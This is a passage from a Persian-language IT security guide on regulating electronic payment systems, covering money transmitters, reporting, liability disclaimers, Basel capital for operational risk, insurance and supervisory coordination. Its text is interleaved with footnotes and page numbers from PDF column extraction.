ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺍﺣﺘﻤﺎﻝ ﺗﺪﺍﻭﻡ ﺑﻴـﺸﺘﺮ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﺎﻣﻄﻤﺌﻦ ﻭ ﻧﺎﺩﺭﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺍﺕ
ﺑﻴﺸﺘﺮ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻣﻲﺗﻮﻧﺪ ﺍﻳـﻦ ﺑﺎﺷـﺪ ﻛـﻪ
ﻭﻇﻴﻔﺔ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺑﺮ ﻋﻬﺪﺓ ﻣﺄﻣﻮﺭﺍﻥ ﺍﺟﺮﺍﻳﻲ ﮔـﺬﺍﺭﺩﻩ
٣٦
ﺷﻮﺩ.
ﭘﻴﺸﮕﺎﻣﺎﻥ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﺳﻴﺴﺘﻢ ﻣﺎﻟﻲ ﻣﺤـﺴﻮﺏ
ﻣﻲﺷﻮﻧﺪ .ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﭘﺮﺩﺍﺧﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺑـﺮﺍﻱ ﭘـﻨﺞ ﻣـﻮﺭﺩ ﺯﻳـﺮ
ﺭﺍﻩﺣﻠﻲ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ:
.۱
.۲
.۳
.۴
.۵
ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ؛
ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ؛
ﺿﻮﺍﺑﻂ؛
ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎ ،ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ ،ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛ ﻭ
ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ.
ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎﻱ ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ
ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ
ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ
ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﻭ ﺗﺒﺎﺩﻝ ﺍﺭﺯ ﻭ ﻟﻮﺍﺯﻡ ﭘﻮﻟﻲ ﻣﺸﻐﻮﻝ ﻓﻌﺎﻟﻴﺖ ﻣﻲﺑﺎﺷﺪ.
ﻻ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ "ﺗﺠﺎﺭﺕ ﺧﺪﻣﺎﺕ ﭘﻮﻟﻲ" ﻣﺸﻐﻮﻝ ﻫﺴﺘﻨﺪ
ﻣﻌﻤﻮ ﹰ
٣٤
ﻭ ﺑﻌﻨــﻮﺍﻥ ﺩﻓــﺎﺗﺮ ﺗــﺴﻮﻳﻪ ﺧﻮﺩﻛــﺎﺭ ﺷــﺨﺺ ﺛﺎﻟــﺚ ﻓﻌﺎﻟﻴــﺖ
ﻣﻲﻛﻨﻨﺪ ٣٥.ﺩﺭ ﺑﺮﺭﺳﻲ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻢ ﭘﺮﺩﺍﺧـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﺍﻟﮕﻮﻳﻲ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﺟﻨﺒﺶ ﭘﻮﻟﻲ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ .ﺣﺠـﻢ
ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﭘﻮﻟﻲ ﻛﻪ ﺑﺠـﺎﻱ ﺩﺍﺧـﻞ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺍﻃـﺮﺍﻑ ﺑﺎﻧﻜﻬـﺎ
Third-Party Automated Clearinghouse
۳۵
ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ،ﺗﺒـﺪﻳﻞ
ﺳﺮﻣﺎﻳﻪ ،ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ.
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺧـﺪﻣﺎﺕ ﺑﻌـﺪ ﺍﺯ ﻓـﺮﻭﺵ ﻭ ﺟﺒـﺮﺍﻥ
ﺧﺴﺎﺭﺕ ﺭﺍ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳـﺨﺖﺍﻓـﺰﺍﺭ
ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﺍﻟﺰﺍﻣﻲ ﻧﻤﺎﻳﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑـﻪ
ﻋﺮﺿﺔ ﻣﺤﺼﻮﻻﺗﻲ ﻣﻠﺰﻡ ﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺳﻴﺒﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ
ﻧﺎﺷﻲ ﺍﺯ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻘـﺎﻭﻡ
ﺑﺎﺷﻨﺪ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺕ ﻳـﺎ ﻣﺤـﺼﻮﻻﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ
ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣﻔـﺎﻇﺘﻲ
ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨـﺪ ﻭ ﺧـﻮﺩ ﺭﺍ ﻣﻠـﺰﻡ
ﻣﻲﺩﺍﻧﻨﺪ ﺫﻛﺮ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻣﺤﺼﻮﻟـﺸﺎﻥ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻳـﻚ
ﺑﺨﺶ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﻭ ﻳـﺎ ﻣﻨﺎﺳـﺐ ﻧﻴـﺴﺖ .ﻳﻜـﻲ ﺍﺯ
ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻫﻤﺔ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﻳـﻚ ﻳﺎﺩﺩﺍﺷـﺖ
ﺳﻠﺐ ﻣﺴﺆﻟﻴﺖ ٣٧ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺍﻇﻬـﺎﺭ
34
۳۶
ﺧﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
Disclaimer Note
37
ﺑﺨﺶ ﺳﻮﻡ
ﺭﻛﻦ ﺩﻭﻡ:
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ
ﺵ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ
ﻲ ﮔﺴﺘﺮ ﹺ
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﭼﮕﻮﻧﮕ ﹺ
ﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻮﺟﻪ ﻛﻨﻨﺪ .ﺍﻭﻟـﻴﻦ ﺩﻟﻴﻠـﻲ ﻛـﻪ
ﻞ ﺍﻧﺘﻘﺎ ﹺ
ﺑﺮﺍﻱ ﻭﺳﺎﻳ ﹺ
ﺑﻴﺸﺘ ﹺﺮ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳﺎﻳﻞ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ
ﺁﻥ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ ﻫﺮﺍﺱ ﺍﺯ ﺗـﺄﻣﻴﻦﻧﺒـﻮﺩﻥ ﺣﻔﺎﻇـﺖ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ .ﺣﻔﺎﻇـﺖ ﺻـﺤﻴﺢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ
ﺍﻃﻤﻴﻨﺎﻥ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺗﻘﻮﻳﺖ ﻧﻈـﻢ ﺑـﺎﺯﺍﺭ ﺷـﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ
ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻓﺮﺍﻫﻢ ﺳﺎﺯﺩ.
١٣٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻲﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ،ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ
ﻏﻴﺮﻣﺠـــﺎﺯ ،ﺣـــﺴﺎﺱ ﻳـــﺎ ﻣﺤﺮﻣﺎﻧـــﻪ ﻧﺒﺎﻳـــﺪ ﺑﻜـــﺎﺭ ﺭﻭﺩ ﻭ ﺩﺭ
ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭻ ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟـﻪ ﭘﺪﻳﺪﺁﻭﺭﻧـﺪﺓ ﺁﻥ ﻧﺨﻮﺍﻫـﺪ
ﺑﻮﺩ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ
ﺑﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺍﻳـﻦ ﺻـﻨﻌﺖ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﻧﻴﺴﺘﻨﺪ ،ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺑـﺎﺭ
ﺩﻳﮕﺮ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻢ ﻫﻨﻮﺯ ﺭﺍﻩ ﺯﻳﺎﺩﻱ ﺗـﺎ
ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﺭﻛﻦ ﺳﻮﻡ:
ﭼﺎﻟﺸﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﻧﻴﺎﺯﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﺍﻱ
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﺳﻞ ٣٨ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪ -ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑـﻪ
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﻧﺪ -ﺑـﻪ ﻣﺨـﺎﻃﺮﺓ ﺍﺯ ﺩﺳـﺖ
ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻳﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳﺘﺮﺍﺗﮋﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﭙﺮﺩﺍﺧﺘﻪﺍﻧﺪ .ﺍﺯ ﺍﻳﻨﺮﻭ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ
ﻭﻗﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻗﻴـﻖ ﻧﻴـﺴﺖ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﺑﻪ ﺷﻬﺮﺕ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﺩ ﺳـﺨﺖ ﺍﺳـﺖ،
ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻜﻲ ﭼﻴـﺴﺖ؟ ﺑـﺎ
ﺗﻮﺟﻪ ﺑﻪ ﻣﺴﺌﻠﻪ ﺗﻌﻴﻴﻦ ﺳـﺮﻣﺎﻳﺔ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻳﻚ ﺭﻭﺵ ﻣﺆﺛﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺭﻭﻧـﺪ
ﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺭﺯﻳﺎﺑﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـ ﹺ
ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺛﺒـﺖ ﮔﺰﺍﺭﺷـﺎﺕ ﭼﻨـﻴﻦ
ﻭﻗﺎﻳﻌﻲ ﺑﺎﺷﺪ ٣٩.ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻘﺎﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﺑـﻪ ﺑﻴﻤـﻪ ﻛـﺮﺩﻥ ﺧـﻮﺩ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﺟﻮﺍﻧـﺐ
Basel
۳۹
ﻣﺴﺌﻮﻟﻴﺖ
ﭼﺎﺭﭼﻮﺏ ﺣﻘـﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ،ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺮﻧﺎﻣﻪﻫـﺎ ،ﻧـﺮﻡﺍﻓـﺰﺍﺭ،
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﺠﺎﺩ ﻛﻨـﺪ ﺗـﺎ
ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﻨﺪ.
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﺁﺯﻣﻮﻥ
ﻋــﻼﻭﻩ ﺑــﺮ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧــﺖ ﻭ ﻧﻈــﺎﺭﺕ ﺑــﺮ
ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺻﻼﺡ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻗـﺎﻧﻮﻧﻲ،
ﻧﻈﺎﺭﺕ ،ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ،ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑـﻮﻳﮋﻩ ﺑـﺮﺍﻱ ﺷـﺮﻛﺘﻬﺎﻱ
ﺗﺠﺎﺭﻱ ﻛﻪ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺍﺭﺍﺋﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ ﻣﻄﺮﺡ ﻣﻲﺑﺎﺷﺪ.
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺑﻨﺪ ۶ﻫﻤﻴﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﻳـﺎ ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ(
ﺗﺮﻏﻴﺐ ﻳـﺎ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﺔ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻓﻌﺎﻟﺘﺮ ﺷﺪﻩ ،ﺍﻳﻦ ﺭﻭﺵ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ
ﻋﻤﻠﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺳـﻼﻣﺖ ﻋﻤـﻮﻣﻲ ﺻـﻨﻌﺖ
٤٠
ﺑﻴﻤﻪ ﻭ ﺳﺎﺧﺘﺎﺭ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻨﺠﺮ ﺷﻮﺩ.
38
ﻛﻤﻴﺘﺔ ﺑﺎﺳﻞ ﺩﺭ ﮔﺮﻭﻩ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ) (EGBﻣﺆﺳـﺴﺔ
ﻧﻈﺎﺭﺕ ﺑﺎﻧﻜﻲ ٤١ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺭ ﺯﻣﻴﻨـﻪ ﺍﻓـﺰﺍﻳﺶ ،ﺍﻳﺠـﺎﺩ
ﺗﻐﻴﻴﺮﺍﺕ ﻳﺎ ﺍﻧﺠﺎﻡ ﺍﺻﻼﺣﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺩﺭ ﻧﻈـﺎﺭﺕ ﻭ ﺍﺭﺯﻳـﺎﺑﻲ
ﺟﻬﺖ ﺗﻄﺒﻴﻖ ﺭﻭﺍﻟﻬﺎ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺷﻜﻞ ﮔﺮﻓﺖ .ﺩﺭ ﺳـﺎﻝ
EBG ،۲۰۰۱ﺍﺻــﻮﻝ ﻣــﺪﻳﺮﻳﺖ ﻣﺨــﺎﻃﺮﻩ ﺑــﺮﺍﻱ ﺑﺎﻧﻜــﺪﺍﺭﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ ﻛﻪ ﺷﺎﻣﻞ ﺍﺻـﻮﻝ ﺧﺎﺻـﻲ ﺑـﻮﺩ ﻛـﻪ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺩﺍﺧﻠــﻲ ،ﺟﺎﻣﻌﻴــﺖ ﺍﻣﻨﻴــﺖ ﺳــﺮﻣﺎﻳﻪﻫــﺎ ﻭ ﻫﻤﭽﻨــﻴﻦ ﺟﺎﻣﻌﻴــﺖ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋـﻼﻡ ﻣـﻲﻛـﺮﺩ .ﺣـﻮﺯﻩﻫـﺎﻱ
ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺟﻬﺖ ﻋﻤﺪﻩﺍﻱ ﭘﻴـﺪﺍ
ﻣﻲﻛﻨﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﻣﻌﺮﻓﻲ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﺍﻧﺒـﻮﻩ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺗﻐﻴﻴﺮ ﺍﻟﮕﻮ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻛـﺮﺩ،
ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻧﻈـﺎﺭﺕ ﺑـﺎﻧﻜﻲ ﻧﻴـﺰ ﺗﻐﻴﻴـﺮ ﻣﺮﻛـﺰ ﺛﻘـﻞ ﺻـﻨﻌﺖ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
ﻫﻤﺎﻫﻨﮕﻲ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺭﻭﻥﻣﺮﺯﻱ ﻭ ﺑﺮﻭﻥﻣﺮﺯﻱ
ﻳﻚ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺑﺎ ﺁﻥ ﺭﻭﺑﺮﻭ ﻫﺴﺘﻨﺪ ﻧﻴـﺎﺯ
ﺑﻪ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﻭ ﺩﻭﺍﻳـﺮ
ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﺍﺳـﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ
۴۰
ﻱ ﺧـﻮﺩ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ،ﺻﻨﻌﺖ ﺑﻴﻤـﻪ ﺑـﻪ ﺧـﻮﺩ ﹺ
